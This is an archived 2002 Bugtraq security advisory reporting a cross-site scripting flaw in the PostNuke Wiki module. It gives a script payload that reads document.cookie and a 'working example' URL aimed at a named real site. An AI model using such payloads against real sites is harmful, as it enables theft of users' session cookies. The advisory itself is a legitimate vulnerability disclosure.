[26207] in bugtraq
Wiki module postnuke Cross Site Scripting Vulnerability
daemon@ATHENA.MIT.EDU (Pistone)
Wed Jul 17 12:18:49 2002
Content-Type: text/plain;
charset="iso-8859-1"
From: Pistone <jorgep@spdps.com.ar>
Reply-To: jorge@pistone.com.ar
To: bugtraq@securityfocus.com
Date: Tue, 16 Jul 2002 21:49:24 -0300
MIME-Version: 1.0
Message-Id: <02071621075300.01363@Holmes>
Content-Transfer-Encoding: 8bit
Cc: xaplo@postnuke-espanol.org
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
- ----------------------------------------------------
Class : input Validation Error
Risk : Due to the simplicity of the attack and the number of sites
that run phpwiki, the risk is classified as Medium to High.
- ----------------------------------------------------
This wiki is running as a PostNuke module.
- ------------------------------------
Exploit: pagename=|script|alert(document.cookie)|/script|
Change | x <>
Working Example :
http://centre.ics.uci.edu/~grape/modules.php?op=modload&name=Wiki&file=index&pagename=|script|alert(document.cookie)|/script|
- --------------------------------------------------------------------------------------------
programmer of wiki module and admin of postnuke-espanol.org receives a copy
this report.
- --------------------------------------------------------
Salu2
Pistone
- - --------
Http://www.gauchohack.com.ar
Http://www.hackindex.org
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org
iD8DBQE9NL8cY47Vx76lNPkRAsNDAJ9M5eXRMxL1ASb2TlWaDaveotKAbgCZAQSz
PlAN98+qigqp8S9pkkfFRm4=
=c2FT
-----END PGP SIGNATURE-----
